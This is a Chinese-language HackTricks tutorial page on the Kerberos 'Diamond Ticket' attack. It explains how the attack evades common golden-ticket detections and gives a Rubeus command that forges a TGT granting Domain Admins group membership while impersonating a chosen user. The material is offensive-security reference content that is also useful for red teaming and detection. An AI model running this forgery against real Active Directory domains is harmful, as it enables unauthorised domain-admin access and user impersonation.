HackTricksDiamond Ticket
Reading time: 3 minutes
tip
学习和实践 AWS 黑客技术:
HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:
HackTricks Training GCP Red Team Expert (GRTE)
支持 HackTricks
- 查看 订阅计划!
- 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live.
- 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。
Diamond Ticket
像金票一样,钻石票是一个可以用来以任何用户身份访问任何服务的TGT。金票是完全离线伪造的,使用该域的krbtgt哈希加密,然后传递到登录会话中使用。由于域控制器不跟踪它(或他们)合法发出的TGT,它们会乐意接受使用其自身krbtgt哈希加密的TGT。
检测金票使用的两种常见技术是:
- 查找没有相应AS-REQ的TGS-REQ。
- 查找具有荒谬值的TGT,例如Mimikatz的默认10年有效期。
钻石票是通过修改由DC发出的合法TGT的字段来制作的。这是通过请求一个TGT,使用域的krbtgt哈希解密它,修改票证的所需字段,然后重新加密它来实现的。这克服了金票的两个上述缺点,因为:
- TGS-REQ将有一个前置的AS-REQ。
- TGT是由DC发出的,这意味着它将具有来自域Kerberos策略的所有正确细节。尽管这些可以在金票中准确伪造,但更复杂且容易出错。
bash
# Get user RID
powershell Get-DomainUser -Identity <username> -Properties objectsid
.\Rubeus.exe diamond /tgtdeleg /ticketuser:<username> /ticketuserid:<RID of username> /groups:512
# /tgtdeleg uses the Kerberos GSS-API to obtain a useable TGT for the user without needing to know their password, NTLM/AES hash, or elevation on the host.
# /ticketuser is the username of the principal to impersonate.
# /ticketuserid is the domain RID of that principal.
# /groups are the desired group RIDs (512 being Domain Admins).
# /krbkey is the krbtgt AES256 hash.
tip
学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE)
支持 HackTricks
- 查看 订阅计划!
- 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live.
- 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。